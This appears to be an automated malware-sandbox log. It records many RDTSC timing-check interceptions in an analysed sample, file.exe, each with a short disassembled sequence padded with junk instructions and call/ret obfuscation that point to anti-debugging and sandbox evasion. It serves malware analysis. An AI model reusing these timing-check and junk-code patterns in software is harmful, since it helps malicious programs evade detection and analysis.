              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F1C2 second address: 77F22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F63C8D82F48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 cld 0x00000025 lea eax, dword ptr [ebp+12472EDEh] 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F63C8D82F48h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F63C8D82F56h 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F22F second address: 76860C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F63C8B57C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F63C8B57C28h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ecx, esi 0x00000015 call dword ptr [ebp+122D1BB3h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F63C8B57C23h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F732 second address: 77F739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F7A8 second address: 77F7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F7AE second address: 77F852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F63C8D82F50h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jns 00007F63C8D82F55h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jne 00007F63C8D82F65h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jmp 00007F63C8D82F4Ah 0x00000029 pop eax 0x0000002a jbe 00007F63C8D82F58h 0x00000030 call 00007F63C8D82F49h 0x00000035 jo 00007F63C8D82F50h 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e jne 00007F63C8D82F46h 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 jnc 00007F63C8D82F46h 0x0000004f pop edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F852 second address: 77F869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F63C8B57C16h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F869 second address: 77F86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F86D second address: 77F888 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F63C8B57C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d je 00007F63C8B57C38h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F63C8B57C16h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F960 second address: 77F96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F96B second address: 77F96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7806A3 second address: 7690B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F63C8D82F4Bh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F63C8D82F48h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 call dword ptr [ebp+122D3592h] 0x0000002d pushad 0x0000002e jmp 00007F63C8D82F59h 0x00000033 push eax 0x00000034 jmp 00007F63C8D82F4Bh 0x00000039 pop eax 0x0000003a popad 0x0000003b pushad 0x0000003c je 00007F63C8D82F53h 0x00000042 pushad 0x00000043 popad 0x00000044 jmp 00007F63C8D82F4Bh 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 0x0000004c jg 00007F63C8D82F46h 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9703 second address: 7B971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jc 00007F63C8B57C16h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jmp 00007F63C8B57C1Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9A0B second address: 7B9A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B9D49 second address: 7B9D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C1Bh 0x00000009 js 00007F63C8B57C16h 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007F63C8B57C21h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD7D1 second address: 7BD7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F53h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD7E8 second address: 7BD7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6907 second address: 7C690D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C61BD second address: 7C61DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F63C8B57C25h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C630F second address: 7C633F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 jmp 00007F63C8D82F52h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007F63C8D82F73h 0x00000013 push eax 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F63C8D82F46h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6612 second address: 7C6618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8867 second address: 7C886B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CB22C second address: 7CB253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F63C8B57C22h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEB0B second address: 7CEB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEB0F second address: 7CEB1E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F63C8B57C16h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CED24 second address: 7CED33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F63C8D82F46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CED33 second address: 7CED39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2255 second address: 7D2264 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F63C8D82F46h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2264 second address: 7D226A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D23E7 second address: 7D2414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007F63C8D82F46h 0x0000000c popad 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F63C8D82F50h 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F63C8D82F46h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2414 second address: 7D2418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2418 second address: 7D2426 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F63C8D82F46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D26D0 second address: 7D26D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D26D4 second address: 7D26D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D26D8 second address: 7D26EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F63C8B57C16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F63C8B57C16h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D282B second address: 7D283B instructions: 0x00000000 rdtsc 0x00000002 js 00007F63C8D82F52h 0x00000008 jns 00007F63C8D82F46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7468C1 second address: 7468D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F63C8B57C20h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D72E3 second address: 7D72FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F63C8D82F56h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D72FF second address: 7D7305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7305 second address: 7D730F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D730F second address: 7D7313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7313 second address: 7D732E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F63C8D82F51h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D732E second address: 7D7333 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7333 second address: 7D734E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F4Eh 0x00000009 pop ecx 0x0000000a ja 00007F63C8D82F52h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D734E second address: 7D7354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7462 second address: 7D746B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D746B second address: 7D7488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F63C8B57C1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnc 00007F63C8B57C16h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7488 second address: 7D7491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D75CE second address: 7D75EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F63C8B57C16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F63C8B57C18h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jp 00007F63C8B57C16h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D772E second address: 7D7738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F63C8D82F46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D81D1 second address: 7D81D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D81D7 second address: 7D81DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D81DB second address: 7D81E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0021 second address: 7E002E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F63C8D82F46h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0D9 second address: 7DE0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0DF second address: 7DE0E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0E5 second address: 7DE0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE0EC second address: 7DE0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE3BA second address: 7DE3BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE6B3 second address: 7DE6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F55h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE6CD second address: 7DE6D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE6D2 second address: 7DE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F63C8D82F4Dh 0x0000000c jp 00007F63C8D82F46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780347 second address: 78034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF808 second address: 7DF80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF80C second address: 7DF814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFD62 second address: 7DFD66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFD66 second address: 7DFD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3B85 second address: 7E3B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3B89 second address: 7E3BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F63C8B57C26h 0x0000000e jmp 00007F63C8B57C1Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3E2E second address: 7E3E34 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E43ED second address: 7E43F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E43F3 second address: 7E43F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8D28 second address: 7E8D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EFFE4 second address: 7EFFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE1FF second address: 7EE205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE205 second address: 7EE211 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F63C8D82F46h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE7B8 second address: 7EE7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F63C8B57C26h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE7D9 second address: 7EE7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE92A second address: 7EE93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C1Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE93E second address: 7EE94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jl 00007F63C8D82F46h 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEACB second address: 7EEACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEACF second address: 7EEAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEAD3 second address: 7EEAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EED94 second address: 7EEDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F53h 0x00000009 jnl 00007F63C8D82F46h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EEDB2 second address: 7EEDB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F730F second address: 7F7314 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7314 second address: 7F731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F731A second address: 7F7323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7323 second address: 7F7327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6DA0 second address: 7F6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F63C8D82F46h 0x0000000d jmp 00007F63C8D82F4Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805315 second address: 805331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805331 second address: 805335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805335 second address: 805347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F63C8B57C1Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805347 second address: 805365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F63C8D82F56h 0x0000000d rdtsc
